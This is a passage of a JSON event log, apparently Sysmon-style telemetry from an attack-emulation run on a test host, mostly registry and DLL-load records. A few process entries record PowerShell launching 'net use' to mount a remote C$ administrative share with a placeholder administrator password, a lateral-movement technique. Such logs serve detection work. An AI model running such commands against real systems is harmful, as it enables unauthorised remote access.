"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dpapi.dll", - "image_path": "C:\\Windows\\System32\\dpapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "file", - "file_name": "BIT6BFA.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570905580000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570905580000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 5868, - 
"process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570906360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "process", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "subtype": "terminate", - "timestamp": 131883570906360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "process", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "file", - "file_name": "BITSADMIN.EXE-80E1BDAA.pf", - "file_path": "C:\\Windows\\Prefetch\\BITSADMIN.EXE-80E1BDAA.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4924, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570906590000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "image_load", 
- "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "process", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c \" net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2260, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570909009984, - "unique_pid": 
"{42FC7E13-CAE2-5C05-0000-001085164E01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "command_line": "cmd.exe /c net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7556, - 
"ppid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570909130000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}", - "unique_ppid": "{42FC7E13-CAE2-5C05-0000-001085164E01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "command_line": "net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", - 
"event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6292, - "ppid": 7556, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "create", - "timestamp": 131883570909230000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}", - "unique_ppid": "{42FC7E13-CAE2-5C05-0000-001024194E01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6292, - "process_name": "net.exe", - 
"process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": 
"C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - 
